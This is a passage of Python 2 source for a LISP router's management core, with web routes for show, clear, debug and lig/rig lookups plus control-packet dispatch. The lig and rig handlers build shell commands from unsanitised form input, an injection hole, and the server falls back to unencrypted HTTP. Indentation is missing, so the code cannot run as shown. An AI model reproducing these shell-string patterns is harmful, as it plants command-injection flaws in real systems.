# lisp_debug_menu_command
#
# Turn on or off debug.
#
@bottle.route('/lisp/debug/<name>')
def lisp_debug_menu_command(name = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Process "disable all" separately.
#
if (name == "disable%all"):
data = lispconfig.lisp_get_clause_for_api("lisp debug")
if (data[0].has_key("lisp debug")):
new = []
for entry in data[0]["lisp debug"]:
key = entry.keys()[0]
new.append({ key : "no" })
#endfor
new = { "lisp debug" : new }
lispconfig.lisp_put_clause_for_api(new)
#endif
data = lispconfig.lisp_get_clause_for_api("lisp xtr-parameters")
if (data[0].has_key("lisp xtr-parameters")):
new = []
for entry in data[0]["lisp xtr-parameters"]:
key = entry.keys()[0]
if (key in ["data-plane-logging", "flow-logging"]):
new.append({ key : "no" })
else:
new.append({ key : entry[key] })
#endif
#endfor
new = { "lisp xtr-parameters" : new }
lispconfig.lisp_put_clause_for_api(new)
#endif
return(lispconfig.lisp_landing_page())
#endif
#
# Process enabling or disable debug logging for a single item.
#
name = name.split("%")
component = name[0]
yesno = name[1]
xtr_parms = ["data-plane-logging", "flow-logging"]
clause_name = "lisp xtr-parameters" if (component in xtr_parms) else \
"lisp debug"
data = lispconfig.lisp_get_clause_for_api(clause_name)
if (data[0].has_key(clause_name)):
new = {}
for entry in data[0][clause_name]:
new[entry.keys()[0]] = entry.values()[0]
if (new.has_key(component)): new[component] = yesno
#endfor
new = { clause_name: new }
lispconfig.lisp_put_clause_for_api(new)
#endif
return(lispconfig.lisp_landing_page())
#enddef
#
# lisp_clear_referral_command
#
# Send a clear command to a LISP component.
#
@bottle.route('/lisp/clear/<name>')
@bottle.route('/lisp/clear/etr/<etr_name>/<stats_name>')
@bottle.route('/lisp/clear/rtr/<rtr_name>/<stats_name>')
@bottle.route('/lisp/clear/itr/<itr_name>')
@bottle.route('/lisp/clear/rtr/<rtr_name>')
def lisp_clear_command(name = "", itr_name = '', rtr_name = "", etr_name = "",
stats_name = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Do various checks.
#
if (lispconfig.lisp_is_user_superuser(None) == False):
output = lisp.lisp_print_sans("Not authorized")
return(lispconfig.lisp_show_wrapper(output))
#endif
ipc = "clear"
if (name == "referral"):
process = "lisp-mr"
print_name = "Referral"
elif (itr_name == "map-cache"):
process = "lisp-itr"
print_name = "ITR <a href='/lisp/show/itr/map-cache'>map-cache</a>"
elif (rtr_name == "map-cache"):
process = "lisp-rtr"
print_name = "RTR <a href='/lisp/show/rtr/map-cache'>map-cache</a>"
elif (etr_name == "stats"):
process = "lisp-etr"
print_name = ("ETR '{}' decapsulation <a href='/lisp/show/" + \
"database'>stats</a>").format(stats_name)
ipc += "%" + stats_name
elif (rtr_name == "stats"):
process = "lisp-rtr"
print_name = ("RTR '{}' decapsulation <a href='/lisp/show/" + \
"rtr/map-cache'>stats</a>").format(stats_name)
ipc += "%" + stats_name
else:
output = lisp.lisp_print_sans("Invalid command")
return(lispconfig.lisp_show_wrapper(output))
#endif
#
    # Send IPC to the selected LISP process. Do not wait for a reply.
#
ipc = lisp.lisp_command_ipc(ipc, "lisp-core")
lisp.lisp_ipc(ipc, lisp_ipc_socket, process)
#
# Only touch lisp.config file if there are static map-cache entries.
#
exist = commands.getoutput("egrep 'lisp map-cache' ./lisp.config")
if (exist != ""):
os.system("touch ./lisp.config")
#endif
output = lisp.lisp_print_sans("{} cleared".format(print_name))
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_show_map_server_command
#
# Have the lisp-etr process show the map-server configuration.
#
@bottle.route('/lisp/show/map-server')
def lisp_show_map_server_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show map-server"))
#enddef
#
# lisp_show_database_command
#
# Have the lisp-etr process show the database-mapping configuration.
#
@bottle.route('/lisp/show/database')
def lisp_show_database_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show database-mapping"))
#enddef
#
# lisp_show_itr_map_cache_command
#
# Have the lisp-itr process show the map-cache.
#
@bottle.route('/lisp/show/itr/map-cache')
def lisp_show_itr_map_cache_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show itr-map-cache"))
#enddef
#
# lisp_show_itr_rloc_probing_command
#
# Have the lisp-itr process show the RLOC-probe list.
#
@bottle.route('/lisp/show/itr/rloc-probing')
def lisp_show_itr_rloc_probing_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show itr-rloc-probing"))
#enddef
#
# lisp_show_itr_map_cache_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/itr/map-cache/lookup')
def lisp_show_itr_map_cache_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show itr-map-cache" + "%" + eid_str
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
command))
#enddef
#
# lisp_show_rtr_map_cache_command
#
# Have the lisp-rtr process show the map-cache.
#
@bottle.route('/lisp/show/rtr/map-cache')
@bottle.route('/lisp/show/rtr/map-cache/<dns>')
def lisp_show_rtr_map_cache_command(dns = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
if (dns == "dns"):
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show rtr-map-cache-dns"))
else:
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show rtr-map-cache"))
#endif
#enddef
#
# lisp_show_rtr_rloc_probing_command
#
# Have the lisp-rtr process show the RLOC-probe list.
#
@bottle.route('/lisp/show/rtr/rloc-probing')
def lisp_show_rtr_rloc_probing_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show rtr-rloc-probing"))
#enddef
#
# lisp_show_rtr_map_cache_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/rtr/map-cache/lookup')
def lisp_show_rtr_map_cache_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show rtr-map-cache" + "%" + eid_str
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
command))
#enddef
#
# lisp_show_referral_command
#
# Have the lisp-mr show the DDT referral-cache.
#
@bottle.route('/lisp/show/referral')
def lisp_show_referral_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show referral-cache"))
#enddef
#
# lisp_show_referral_cache_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/referral/lookup')
def lisp_show_referral_cache_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show referral-cache" + "%" + eid_str
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_delegation_command
#
# Have the lisp-mr show the DDT configured delegation information.
#
@bottle.route('/lisp/show/delegations')
def lisp_show_delegations_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show delegations"))
#enddef
#
# lisp_show_delegations_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/delegations/lookup')
def lisp_show_delegations_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show delegations" + "%" + eid_str
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_site_command
#
# Have the lisp-ms process show the site registration information. Convert
# eid-prefix from format "<iid>-<eid>-<ml>" to "[<iid>]<eid>/<ml>" internal
# format. We need to do this because URLs should avoid square brackets.
#
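# For example (illustrative values only), the URL component "1000-10.0.0.0-8"
# is converted to the internal EID-prefix form "[1000]10.0.0.0/8".
#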
@bottle.route('/lisp/show/site')
@bottle.route('/lisp/show/site/<eid_prefix>')
def lisp_show_site_command(eid_prefix = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
command = "show site"
if (eid_prefix != ""):
command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_itr_dyn_eid_command
#
# Show dynamic-EIDs from the ITR's point of view.
#
@bottle.route('/lisp/show/itr/dynamic-eid/<eid_prefix>')
def lisp_show_itr_dyn_eid_command(eid_prefix = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
command = "show itr-dynamic-eid"
if (eid_prefix != ""):
command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_dyn_eid_command
#
# Show dynamic-EIDs from the ITR's point of view.
#
@bottle.route('/lisp/show/etr/dynamic-eid/<eid_prefix>')
def lisp_show_dyn_eid_command(eid_prefix = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
command = "show etr-dynamic-eid"
if (eid_prefix != ""):
command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_site_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/site/lookup')
def lisp_show_site_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show site" + "%" + eid_str + "@lookup"
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_lig_command
#
# Do interactive lig.
#
@bottle.post('/lisp/lig')
def lisp_lig_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid = bottle.request.forms.get("eid")
mr = bottle.request.forms.get("mr")
count = bottle.request.forms.get("count")
no_nat = "no-info" if bottle.request.forms.get("no-nat") == "yes" else ""
#
# Default map-resolver to localhost.
#
if (mr == ""): mr = "localhost"
#
# Check for no input. User error.
#
if (eid == ""):
output = "Need to supply EID address"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
lig = ""
if os.path.exists("lisp-lig.pyo"): lig = "-O lisp-lig.pyo"
if os.path.exists("lisp-lig.py"): lig = "lisp-lig.py"
#
# Something went wrong with the install.
#
if (lig == ""):
output = "Cannot find lisp-lig.py or lisp-lig.pyo"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
if (count != ""): count = "count {}".format(count)
command = 'python {} "{}" to {} {} {}'.format(lig, eid, mr, count, no_nat)
output = commands.getoutput(command)
output = output.replace("\n", "<br>")
output = lisp.convert_font(output)
rloc = lisp.space(2) + "RLOC:"
output = output.replace("RLOC:", rloc)
empty = lisp.space(2) + "Empty,"
output = output.replace("Empty,", empty)
geo = lisp.space(4) + "geo:"
output = output.replace("geo:", geo)
elp = lisp.space(4) + "elp:"
output = output.replace("elp:", elp)
rle = lisp.space(4) + "rle:"
output = output.replace("rle:", rle)
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#enddef
#
# lisp_rig_command
#
# Do interactive rig.
#
@bottle.post('/lisp/rig')
def lisp_rig_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid = bottle.request.forms.get("eid")
ddt = bottle.request.forms.get("ddt")
follow_all = "follow-all-referrals" if \
bottle.request.forms.get("follow") == "yes" else ""
#
# Default ddt-node to localhost.
#
if (ddt == ""): ddt = "localhost"
#
# Check for no input. User error.
#
if (eid == ""):
output = "Need to supply EID address"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
rig = ""
if os.path.exists("lisp-rig.pyo"): rig = "-O lisp-rig.pyo"
if os.path.exists("lisp-rig.py"): rig = "lisp-rig.py"
#
# Something went wrong with the install.
#
if (rig == ""):
output = "Cannot find lisp-rig.py or lisp-rig.pyo"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
command = 'python {} "{}" to {} {}'.format(rig, eid, ddt, follow_all)
output = commands.getoutput(command)
output = output.replace("\n", "<br>")
output = lisp.convert_font(output)
ref = lisp.space(2) + "Referrals:"
output = output.replace("Referrals:", ref)
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#enddef
#
# lisp_run_geo_lig
#
# Do lookup on both supplied EIDs passed as input parameters and return
# a geo-point and geo-prefix if they are found in RLOC records.
#
def lisp_run_geo_lig(eid1, eid2):
lig = None
if os.path.exists("lisp-lig.pyo"): lig = "-O lisp-lig.pyo"
if os.path.exists("lisp-lig.py"): lig = "lisp-lig.py"
if (lig == None): return([None, None])
#
    # First get a map-resolver address.
#
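    # The clause being parsed typically looks like this (illustrative
    # address only):
    #
    #   lisp map-resolver {
    #       address = 10.0.0.1
    #   }
    #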
o = commands.getoutput("egrep -A 2 'lisp map-resolver {' ./lisp.config")
mr = None
for keyword in ["address = ", "dns-name = "]:
mr = None
index = o.find(keyword)
if (index == -1): continue
mr = o[index+len(keyword)::]
index = mr.find("\n")
if (index == -1): continue
mr = mr[0:index]
break
#endfor
if (mr == None): return([None, None])
#
# Lookup EIDs in loop.
#
addr = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
geos = []
for eid in [eid1, eid2]:
#
# Don't do lookups for Geo-Coordinates. Only for EIDs that are not
# in Geo-Coordinate format.
#
if (addr.is_geo_string(eid)):
geos.append(eid)
continue
#endif
command = 'python {} "{}" to {} count 1'.format(lig, eid, mr)
for cmd in [command, command + " no-info"]:
            output = commands.getoutput(cmd)
index = output.find("geo: ")
if (index == -1):
if (cmd != command): geos.append(None)
continue
#endif
output = output[index+len("geo: ")::]
index = output.find("\n")
if (index == -1):
if (cmd != command): geos.append(None)
continue
#endif
geos.append(output[0:index])
break
#endfor
#endfor
return(geos)
#enddef
#
# lisp_geo_command
#
# Do geo lookups from lisp.lisp_geo() functions.
#
@bottle.post('/lisp/geo')
def lisp_geo_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid = bottle.request.forms.get("geo-point")
eid_prefix = bottle.request.forms.get("geo-prefix")
output = ""
#
    # If the EID is in the form of an IP address or distinguished-name, run
    # a lig to get a record from the mapping database to obtain the geo data.
#
gs = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
geo_point = lisp.lisp_geo("")
geo_prefix = lisp.lisp_geo("")
point, prefix = lisp_run_geo_lig(eid, eid_prefix)
#
    # Check if the EID is already in geo-coordinate format; otherwise use the
    # geo-point returned from the database lookup.
#
if (gs.is_geo_string(eid)):
if (geo_point.parse_geo_string(eid) == False):
output = "Could not parse geo-point format"
#endif
elif (point == None):
output = "EID {} lookup could not find geo-point".format(
lisp.bold(eid, True))
elif (geo_point.parse_geo_string(point) == False):
output = "Could not parse geo-point format returned from lookup"
#endif
#
    # The geo-point is good; now check the EID-prefix or geo-prefix format
    # returned from the database lookup.
#
if (output == ""):
if (gs.is_geo_string(eid_prefix)):
if (geo_prefix.parse_geo_string(eid_prefix) == False):
output = "Could not parse geo-prefix format"
#endif
elif (prefix == None):
output = "EID-prefix {} lookup could not find geo-prefix".format( \
lisp.bold(eid_prefix, True))
elif (geo_prefix.parse_geo_string(prefix) == False):
output = "Could not parse geo-prefix format returned from lookup"
#endif
#endif
#
# No input errors. Return good results. Otherwise, error response in
# variable 'output'.
#
if (output == ""):
eid = "" if (eid == point) else ", EID {}".format(eid)
eid_prefix = "" if (eid_prefix == prefix) else \
", EID-prefix {}".format(eid_prefix)
point_str = geo_point.print_geo_url()
prefix_str = geo_prefix.print_geo_url()
km = geo_prefix.radius
dd_point = geo_point.dms_to_decimal()
dd_point = (round(dd_point[0], 6), round(dd_point[1], 6))
dd_prefix = geo_prefix.dms_to_decimal()
dd_prefix = (round(dd_prefix[0], 6), round(dd_prefix[1], 6))
distance = round(geo_prefix.get_distance(geo_point), 2)
inside = "inside" if geo_prefix.point_in_circle(geo_point) else \
"outside"
spo = lisp.space(2)
spe = lisp.space(1)
sd = lisp.space(3)
output = ("Geo-Point:{}{} {}{}<br>Geo-Prefix:{}{} {}, {} " + \
"kilometer radius{}<br>").format(spo, point_str, dd_point, eid,
spe, prefix_str, dd_prefix, km, eid_prefix)
output += "Distance:{}{} kilometers, point is {} of circle".format(sd,
distance, lisp.bold(inside, True))
#endif
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#enddef
#
# lisp_get_info_source
#
# See if this source has sent an Info-Request and we are caching it so we
# can proxy Map-Request for it. Either address OR nonce can be supplied to
# determine if we are doing a lookup based on address or nonce.
#
def lisp_get_info_source(addr_str, port, nonce):
if (addr_str != None):
for info_source in lisp.lisp_info_sources_by_address.values():
info_source_str = info_source.address.print_address_no_iid()
if (info_source_str == addr_str and info_source.port == port):
return(info_source)
#endif
#endfor
return(None)
#endif
if (nonce != None):
if (nonce not in lisp.lisp_info_sources_by_nonce): return(None)
return(lisp.lisp_info_sources_by_nonce[nonce])
#endif
return(None)
#enddef
#
# lisp_nat_proxy_map_request
#
# Grab the nonce from the Map-Request, store it in the info-source data
# structure and modify the ITR-RLOCs field so the Map-Reply comes back to us.
#
def lisp_nat_proxy_map_request(lisp_sockets, info_source, packet):
#
# Parse and move packet pointer to beginning of Map-Request.
#
ecm = lisp.lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lisp.lprint("Could not decode ECM packet")
return(True)
#endif
header = lisp.lisp_control_header()
if (header.decode(packet) == None):
lisp.lprint("Could not decode control header")
return(True)
#endif
if (header.type != lisp.LISP_MAP_REQUEST):
lisp.lprint("Received ECM without Map-Request inside")
return(True)
#endif
#
# We are at the Map-Request header.
#
map_request = lisp.lisp_map_request()
packet = map_request.decode(packet, None, 0)
nonce = map_request.nonce
addr_str = info_source.address.print_address_no_iid()
#
# Print Map-Request again to show what has changed.
#
map_request.print_map_request()
lisp.lprint("Process {} from info-source {}, port {}, nonce 0x{}". \
format(lisp.bold("nat-proxy Map-Request", False),
lisp.red(addr_str, False), info_source.port,
lisp.lisp_hex_string(nonce)))
#
# Store nonce in info-source and cache in dictionary array. We will need
# to find it based on nonce when the Map-Reply is returned to us.
#
info_source.cache_nonce_for_info_source(nonce)
#
    # Do not time out Map-Requests that are subscription-requests, because a
    # Map-Notify can be triggered back to the requester at any time.
#
info_source.no_timeout = map_request.subscribe_bit
#
# Check if we are already in ITR-RLOCs list. If so, this could be looping.
# Return so the Map-Request can be processed in the regular fashion (that
    # is, sent on DDT or to a Map-Resolver).
#
for itr_rloc in map_request.itr_rlocs:
if (itr_rloc.is_local()): return(False)
#endfor
#
# Store new ITR-RLOCs list.
#
myself = lisp.lisp_myrlocs[0]
map_request.itr_rloc_count = 0
map_request.itr_rlocs = []
map_request.itr_rlocs.append(myself)
packet = map_request.encode(None, 0)
map_request.print_map_request()
deid = map_request.target_eid
if (deid.is_ipv6()):
myself_v6 = lisp.lisp_myrlocs[1]
if (myself_v6 != None): myself = myself_v6
#endif
#
# Send ECM based Map-Request to Map-Resolver.
#
ms = lisp.lisp_is_running("lisp-ms")
lisp.lisp_send_ecm(lisp_sockets, packet, deid, lisp.LISP_CTRL_PORT,
deid, myself, to_ms=ms, ddt=False)
return(True)
#enddef
#
# lisp_nat_proxy_reply
#
# Grab the nonce from the Map-Request, store it in the info-source data
# structure and modify the ITR-RLOCs field so the Map-Reply/Notify comes
# back to us.
#
def lisp_nat_proxy_reply(lisp_sockets, info_source, packet, mr_or_mn):
addr_str = info_source.address.print_address_no_iid()
port = info_source.port
nonce = info_source.nonce
mr_or_mn = "Reply" if mr_or_mn else "Notify"
mr_or_mn = lisp.bold("nat-proxy Map-{}".format(mr_or_mn), False)
lisp.lprint("Forward {} to info-source {}, port {}, nonce 0x{}".format( \
mr_or_mn, lisp.red(addr_str, False), port,
lisp.lisp_hex_string(nonce)))
#
# Send on socket with arguments passed from IPC message.
#
dest = lisp.lisp_convert_4to6(addr_str)
lisp.lisp_send(lisp_sockets, dest, port, packet)
#enddef
#
# lisp_core_dispatch_packet
#
# Look at packet type and decide which process to send it to.
#
def lisp_core_dispatch_packet(lisp_sockets, source, sport, packet):
global lisp_ipc_socket
header = lisp.lisp_control_header()
if (header.decode(packet) == None):
lisp.lprint("Could not decode control header")
return
#endif
#
    # In the lispers.net implementation any LISP system can process Info-
    # Requests; we have the lisp-core process do this. lig/rig and the
    # lisp-etr process send Info-Request messages. Since the lisp-core
    # process handles Info-Requests, it responds with Info-Reply messages,
    # which are sent to the ephemeral port and so go straight back to the
    # lig/rig or lisp-etr processes.
#
if (header.type == lisp.LISP_NAT_INFO):
if (header.info_reply == False):
lisp.lisp_process_info_request(lisp_sockets, packet, source, sport,
lisp.lisp_ms_rtr_list)
#endif
return
#endif
local_packet = packet
packet = lisp.lisp_packet_ipc(packet, source, sport)
#
# Map-Registers, Echos, and Map-Notify-Acks go to the lisp-ms process.
#
if (header.type in (lisp.LISP_MAP_REGISTER, lisp.LISP_MAP_NOTIFY_ACK)):
lisp.lisp_ipc(packet, lisp_ipc_socket, "lisp-ms")
return
#endif
#
# Map-Reply messages go to ITRs.
#
if (header.type == lisp.LISP_MAP_REPLY):
map_reply = lisp.lisp_map_reply()
map_reply.decode(local_packet)
info_source = lisp_get_info_source(None, 0, map_reply.nonce)
if (info_source):
lisp_nat_proxy_reply(lisp_sockets, info_source, local_packet, True)
else:
lig = "/tmp/lisp-lig"
if (os.path.exists(lig)):
lisp.lisp_ipc(packet, lisp_ipc_socket, lig)
else:
lisp.lisp_ipc(packet, lisp_ipc_socket, "lisp-itr")
#endif
#endif
return
#endif
#
# Map-Notify messages go to ITRs.
#
if (header.type == lisp.LISP_MAP_NOTIFY):
map_notify = lisp.lisp_map_notify(lisp_sockets)
map_notify.decode(local_packet)
info_source = lisp_get_info_source(None, 0, map_notify.nonce)
if (info_source):
lisp_nat_proxy_reply(lisp_sockets, info_source, local_packet,
False)
else:
lig = "/tmp/lisp-lig"
if (os.path.exists(lig)):
lisp.lisp_ipc(packet, lisp_ipc_socket, lig)
else:
process = "lisp-rtr" if lisp.lisp_is_running("lisp-rtr") else \
"lisp-etr"
lisp.lisp_ipc(packet, lisp_ipc_socket, process)
#endif
#endif
return
#endif
#
# Map-Referral messages go to MRs. But if a rig client is running on
# this machine, IPC it to the client.
#
if (header.type == lisp.LISP_MAP_REFERRAL):
rig = "/tmp/lisp-rig"
if (os.path.exists(rig)):
lisp.lisp_ipc(packet, lisp_ipc_socket, rig)
else:
lisp.lisp_ipc(packet, lisp_ipc_socket, "lisp-mr")
#endif
return
#endif
#
    # Map-Requests go to ETRs/RTRs when they are RLOC-probes or SMR-invoked
    # requests, and go to ITRs when they are SMRs.
#
if (header.type == lisp.LISP_MAP_REQUEST):
process = "lisp-itr" if (header.is_smr()) else "lisp-etr"
#
# RLOC-probes are received specifically by the process by pcaping
# on port 4342.
#
if (header.rloc_probe): return
lisp.lisp_ipc(packet, lisp_ipc_socket, process)
return
#endif
#
# ECMs can go to a lot of places. They are sent ITR->MR, LIG->MR, MR->DDT,
# MR->MS, and MS->ETR. If we find an Info-Request source, this core
# process will process the Map-Request so it can get the Map-Reply and
# forward to the translated address and port of a client behind a NAT.
#
if (header.type == lisp.LISP_ECM):
info_source = lisp_get_info_source(source, sport, None)
if (info_source):
if (lisp_nat_proxy_map_request(lisp_sockets, info_source,
local_packet)): return
#endif
process = "lisp-mr"
if (header.is_to_etr()):
process = "lisp-etr"
elif (header.is_to_ms()):
process = "lisp-ms"
elif (header.is_ddt()):
if (lisp.lisp_is_running("lisp-ddt")):
process = "lisp-ddt"
elif (lisp.lisp_is_running("lisp-ms")):
process = "lisp-ms"
#endif
elif (lisp.lisp_is_running("lisp-mr") == False):
process = "lisp-etr"
#endif
lisp.lisp_ipc(packet, lisp_ipc_socket, process)
#endif
return
#enddef
#
# lisp_ssl_server
#
# Setup cherrypy server that supports SSL connections. This is so we can
# protect passwords that flow over an http connection.
#
# Used the following to create private key and cert:
#
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
#
class lisp_ssl_server(bottle.ServerAdapter):
def run(self, hand):
cert = "./lisp-cert.pem"
#
# Use user provided lisp-cert.pem if it exists. Otherwise use the
# lispers.net default lisp-cert.pem.default file.
#
if (os.path.exists(cert) == False):
os.system("cp ./lisp-cert.pem.default {}".format(cert))
lisp.lprint(("{} does not exist, creating a copy from lisp-" + \
"cert.pem.default").format(cert))
#endif
server = wsgiserver.CherryPyWSGIServer((self.host, self.port), hand)
server.ssl_adapter = pyOpenSSLAdapter(cert, cert, None)
# context = SSL.Context(SSL.SSLv23_METHOD)
# server.ssl_adapter.context = context
try:
server.start()
finally:
server.stop()
#endtry
#enddef
#endclass
#
# lisp_bottle_ipv4_process
#
# Variable bottle_port can take on the following values:
#
# 8080 - run web server on port 8080 using SSL
# 443 - run web server on port 443 using SSL
# -8080 - run web server on port 8080 with no SSL (no secure connection).
#
# Any other port is accepted and used with SSL. If a "-" precedes it, it is
# used with no SSL.
#
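# For example (illustrative; the script name may differ in an install):
# "python lisp-core.py 443" serves the web UI over SSL on port 443, while
# "python lisp-core.py -8080" serves it without SSL on port 8080.
#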
def lisp_bottle_ipv4_process(bottle_port):
lisp.lisp_set_exception()
#
    # No security. Usually for testing purposes or to avoid the complexities
    # of installing OpenSSL.
#
if (bottle_port < 0):
bottle.run(host="0.0.0.0", port=-bottle_port)
return
#endif
bottle.server_names["lisp-ssl-server"] = lisp_ssl_server
#
# If you want to run without SSL, do this and comment out the above call.
#
try:
bottle.run(host="0.0.0.0", port=bottle_port, server="lisp-ssl-server",
fast=True)
except:
bottle.run(host="0.0.0.0", port=bottle_port, fast=True)
#endtry
return
#enddef
#
# lisp_bottle_ipv6_process
#
# Start HTTP server on port 8080. But bottle does not support IPv6 yet so
# we comment out the call.
#
def lisp_bottle_ipv6_process():
lisp.lisp_set_exception()
# run(host="0::0", port=8080)
return
#enddef
#
# lisp_check_processes
#
# Check to see if any component has gone down when it should be running. And
# if it comes up when it should be running, download the configuration commands
# it is responsible for.
#
def lisp_check_processes(lisp_socket):
lisp.lisp_set_exception()
status = {"lisp-itr" : False, "lisp-etr" : False, "lisp-rtr" : False,
"lisp-mr" : False, "lisp-ms" : False, "lisp-ddt" : False}
while (True):
time.sleep(1)
old_status = status
status = {}
for process in old_status:
status[process] = lisp.lisp_is_running(process)
if (old_status[process] == status[process]): continue
lisp.lprint("*** Process '{}' has {} ***".format(process,
"come up" if status[process] else "gone down"))
#
# If process has come up, send configuration commands.
#
if (status[process] == True):
lisp.lisp_ipc_lock.acquire()
lispconfig.lisp_send_commands(lisp_socket, process)
lisp.lisp_ipc_lock.release()
#endif
#endfor
#endwhile
return
#enddef
#
# lisp_timeout_info_sources
#
# Timeout info sources from lisp_info_source_list{}.
#
def lisp_timeout_info_sources():
lisp.lisp_set_exception()
timeout = 60
while (True):
time.sleep(timeout)
delete_list = []
now = lisp.lisp_get_timestamp()
#
# Find entries that are greater than 1 minute old.
#
for key in lisp.lisp_info_sources_by_address:
info_source = lisp.lisp_info_sources_by_address[key]
if (info_source.no_timeout): continue
            if (info_source.uptime + timeout > now): continue
delete_list.append(key)
nonce = info_source.nonce
if (nonce == None): continue
if (nonce in lisp.lisp_info_sources_by_nonce):
lisp.lisp_info_sources_by_nonce.pop(nonce)
#endif
#endfor
#
# Go through delete list to remove from dictionary array.
#
for key in delete_list:
lisp.lisp_info_sources_by_address.pop(key)
#endfor
#endwhile
return
#enddef
#
# lisp_core_control_packet_process
#
# Listen for IPC messages from LISP component processes. They want to send
# control packets out on the network from UDP port 4342.
#
def lisp_core_control_packet_process(lisp_ipc_control_socket, lisp_sockets):
lisp.lisp_set_exception()
while (True):
try: packet_data = lisp_ipc_control_socket.recvfrom(9000)
except: return(["", "", "", ""])
data = packet_data[0].split("@")
source = packet_data[1]
opcode = data[0]
dest = data[1]
port = int(data[2])
packet = data[3::]
if (len(packet) > 1):
packet = lisp.lisp_bit_stuff(packet)
else:
packet = packet[0]
#endif
if (opcode != "control-packet"):
lisp.lprint(("lisp_core_control_packet_process() received" + \
"unexpected control-packet, message ignored"))
continue
#endif
lisp.lprint(("{} {} bytes from {}, dest/port: {}/{}, control-" + \
"packet: {}").format(lisp.bold("Receive", False), len(packet),
source, dest, port, lisp.lisp_format_packet(packet)))
